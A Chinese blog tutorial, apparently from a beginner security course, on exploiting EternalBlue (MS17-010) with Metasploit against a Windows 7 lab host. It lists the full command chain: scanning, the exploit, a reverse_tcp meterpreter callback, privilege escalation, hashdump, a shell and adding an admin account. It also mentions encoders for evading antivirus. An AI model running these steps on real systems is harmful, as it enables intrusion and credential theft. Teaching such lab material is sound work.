网络安全零基础入门(第十章-3)利用工具快速拿下服务器(KaLi-MSF)

最新推荐文章于 2024-08-06 10:19:57 发布
最新推荐文章于 2024-08-06 10:19:57 发布
阅读量226 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43660456/article/details/105567617
版权
  • 每日一句:学习是一个循序渐进的过程,不要懈怠。
  • 本篇内容:认识MSF和永恒之蓝
         MSF的基础命令
         漏洞利用基本流程
         实战漏洞利用

一、认识MSF和永恒之蓝

1.定义
    Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具
       
    我们能够通过它发现漏洞并进行快速实施攻击(需要在授权的情况下!)
      //这款“美少妇”工具kali自带
          
2.使用
    第一次使用MSF
    开启数据库:service postgresql start
    初始化msf数据库: msfdb init
    开启MSF: msfconsole
    
    注意:
      ~这是初始化msf的默认数据库,不然运行会比较慢
        以后再使用的话,就直接开启msf即可
         
      ~MSF的启动漫画是随机的

二、MSF的基础命令

1.msf5的五大模块
    ~auxiliary  辅助模块
      为渗透测试信息搜集提供了大量的辅助模块支持
    
      命名规则:
        操作系统/服务/名称
        windows/smb/ms17_010_eternalblue
  
    ~Exploits  攻击模块
      利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,
      从而获得对远程目标系统访问权的代码组件。
       
    ~Payload  攻击载荷模块
      攻击成功后促使靶机运行的一段植入代码
      
      命名规则:
        操作系统/类型/名称
        windows/x64/meterpreter/reverse_tcp
         
    ~Post  后渗透攻击模块
      收集更多信息或进一步访问被利用的目标系统
      
    ~Encoders  编码模块
      将攻击载荷进行编码,来绕过防护软件拦截
        
2.常用命令
    ~help/?   帮助菜单
    
    ~exit    退出msf
    
    ~Back    返回
    
    ~show   显示所给类型的模块
      例如:show auxiliary   //查看辅助模块
      
      补充:
        ~rank表示好用级别:
          normal(正常),
          excellent(优秀),
          good(良好),
          average(平均)
            
        ~数字
          代表一种作用,可以直接用前边数字调用
             
    ~info   显示一个或者多个模块的信息
        例如: info windows/smb/ms17_010_eternalblue
           
    ~search   寻找
        例如:search ms17
      
    ~更新MSF:apt-get install metasploit-framework

三、漏洞利用基本流程

1.扫描靶机
    use auxiliary/scanner/smb/smb_ms17_010   //使用辅助模块
     
    进入此模块,输入options,
    在这个下,我们可以看看我们需要设置哪些参数
      
      ( Required栏为“yes”的参数,要不是系统已经设置好的
       要不就是需要我们设置的 )
    例如 :我们设置rhosts, set rhosts 192.168.221.129
    
2.选择exploit
    之后出现的结果,前边出现绿色的“[+]”且后边出现我们的目标IP
      就说明我们可以进行攻击
      
    back 返回上一级
    
    use exploit/windows/smb/ms17_010_eternalblue
    
    option看一下
    
    set rhosts 192.168.221.129
       
3.选择payload
    set payload windows/x64/meterpreter/reverse_tcp
    
    options看一下(因为payload也需要设置配置)
    
    set lhosts 192.168.221.133  //lhosts是本机IP
      //设置之后,我们之前打进去的木马,就会来找我们的IP
         
4.攻击   exploit
   
5.提权   getsystem
   
6.枚举密码   hashdump  //一般密码都是加密的
     
7.去拿个shell   shell
    
8.查看权限    whoami
    
9.在尝试添加一个账户
    net user admin admin /add
       
10.在看看所有用户 net user
    //本次攻击靶机是win 7 sp1 //win 7 企业版

四、实战漏洞利用

1.正反向连接
    ~正向连接 : 我们去连接木马
    ~反向连接 : 木马来连接我们 //这个更稳定一些,且不太容易被拦截
    
2.不熟悉的话,多练习几遍
   
3.提权的原理
    对面(目标)运行的一些程序具有高权限,
    我们利用这个进程执行一些命令,以达到我么的目的
    iis6.0de提权 建议百度一下

五、总结

  • 理解KaLi-MSF的原理
  • 熟悉MSF的基本命令
  • 掌握漏洞利用基本流程
划水的小白
关注
2022全国职业技能大赛-网络安全赛题解析总结①(超详细)
Aluxian_的博客
05-11 1万+
2022全国职业技能大赛-网络安全赛题解析总结(自己得思路)模块A 基础设施设置与安全加固(20分)模块B 网络安全事件响应、数字取证调查和应用安全(40分)模块C CTF夺旗-攻击(20分)模块D CTF夺旗-防御(20分) 模块A 基础设施设置与安全加固(20分) 一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录安全加固、数据库安全策略、流量完整性策略、事件监控策略、防火墙策略、IP协议安全配置等多种安全策略来提升服务器
利用msf生成木马拿下主机shell
mulincong的博客
05-25 635
利用msf生成木马拿下主机shell 关于拿下shell的后渗透我会逐渐出文章,请关注
网络安全入门到精通(第十章-3)利用工具快速拿下服务器KaLi-MSF
划水的小白白
02-23 606
本文内容: ~认识MSF和永恒之蓝 ~MSF的基础命令 ~漏洞利用基本流程 ~实战漏洞利用 额外说明: 这篇文章,仅仅作为扩展,大家了解一下MSF(美少妇) 一、认识MSF和永恒之蓝 1,定义 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、 开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的 专业级漏洞攻击工具 ...
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
2401_85773496的博客
08-06 1027
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…不断更新大量的Exploit程序和报告,它的搜索功能可以搜索整个网站内容。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。
网络安全入门kali
u011893782的博客
03-27 866
kali是一个渗透用的工具操作系统。网上的资源很多,最近听了一门,简单做了一些笔记。 这门课主要是kali入门课,包含kali简介安装、kali完成主机和端口扫描、wireshark工具的使用。 一、kali的官网 www.kali.org,国内就可以访问,网站有点慢。这块也讲了一些查询国外的技巧。 二、关于端口扫描技术,netdiscover可以利用ARP扫描技术,并通过mac信息,获取...
Kali渗透—拿下目标服务器
shierbai的博客
05-15 281
还在纠结那个flag的事情,这关直接要求拿webshell,第一反应就是做文件上传,感觉自己思路挺固化的。既然都这样了那就直接连接吧。这都摆我眼前了,试一下。
msf实战提权windows_学员实战 | 记一次对非法站点测试的反思
weixin_39572409的博客
11-22 1629
hanzo学员某一天突然来问,如何撸这个站【非法而且是境外ip地址】然后慢慢指导了下,搞定!,也不算全部搞完!然后群里某一天讨论到这个v01cano想复现下搞一下,然后v01cano也搞下了,还抓了管理员密码下面是v01cano的渗透记录提前声明:此次渗透是先看了一篇文章,并与博主有交流后进行的,我想就这次渗透学习到的东西做个笔记如下。此次渗透为对某个非法网站的渗透【服务器ip地址在美国...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
网络安全利器---------kalikali的安装
一枚不知名的Java程序猿
08-02 2756
kali安装
kali linux-msf-ssh爆破
10-13
Kali Linux是一款专门为渗透测试和安全审计设计的操作系统,内置了大量的安全工具。本文将详细介绍如何在Kali Linux环境下使用Nmap和Metasploit进行SSH爆破,旨在帮助安全研究人员和IT专业人士提高其技能水平。 ###...
网络安全kali web安全 Kalimsf简单的漏洞利用
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
网络-网络安全-kali linux基本安装入门记录
我不是庸医
11-05 462
1、安装kalilinux 逐步进行,如果你想跳过很多,直接安装,很有可能忘了输入用户名和密码 结果吗,就是导致安装后无法等登录了 很多人遇到过,安装kali,好像也成功了,也出现登录界面了,但是要输入用户名和面 傻眼了吧,重装吧…… 2、kali连接网络 这个可以在安装后再进行设置,设置后,才能访问网络,进行软件更新 interfaces配置 dns配置 reboot oK(可...
kali拿网站服务器,Kali攻破网站和服务器
weixin_29340327的博客
08-10 9036
Kali攻破网站和服务器发布时间:2018-08-04 16:09,浏览次数:877, 标签:Kali通过阅读这篇博客之后,你可以学习到一下几个关于渗透测试的知识点:1、渗透测试前的信息采集2、sqlmap的使用3、nmap,nikto(网页服务器扫描器),w3af(Web应用扫描器)的使用4、nc反弹提权5、linux系统的权限提升现在我们以hack-test.com作为要入侵的网站。第一步:...
封神台-Kali系列
it_wzb的博客
09-27 284
看题目,sqlmap实操靶场,所以咱们直接上sqlmap。注意审题:“获得管理员密码”。所以管理员密码就是flag。进入首页之后,直接找后台,习惯性的/admin一下。果然username和password随便输,用Burp先抓个包。注意看那个位置是存在sql注入的,用可直接跳过登录直接进入到后台,但是我们的目标是找到管理员登录密码。所以,把整个数据包复制到.txt文件中,用sqlmap跑。找到了该网站的数据库名:qcms找到了该数据库下的所有的表,那肯定就是qcms_admin 了。
使用MSF进行提权(windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
MSF渗透测试之msfvenom提权
lza20001103的博客
04-04 1008
MSF渗透测试之msfvenom提权
初学MSF之渗透、提权、免杀(上)
qq_53058639的博客
08-01 2121
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
网络安全MSF提权
一直被模仿,从未被超越
03-15 1023
学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。1、当我们通过MSF成功登录靶机时,进行提权时如果报如下,表示没有拿到系统权限。5、我们找到一个漏洞,注意:这里不是每个漏洞都可以成功,要多试几个。6、再次进行渗透,成功出现meterpreter ,代表成功。3、设置 Session。2、使用本地漏洞模块。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值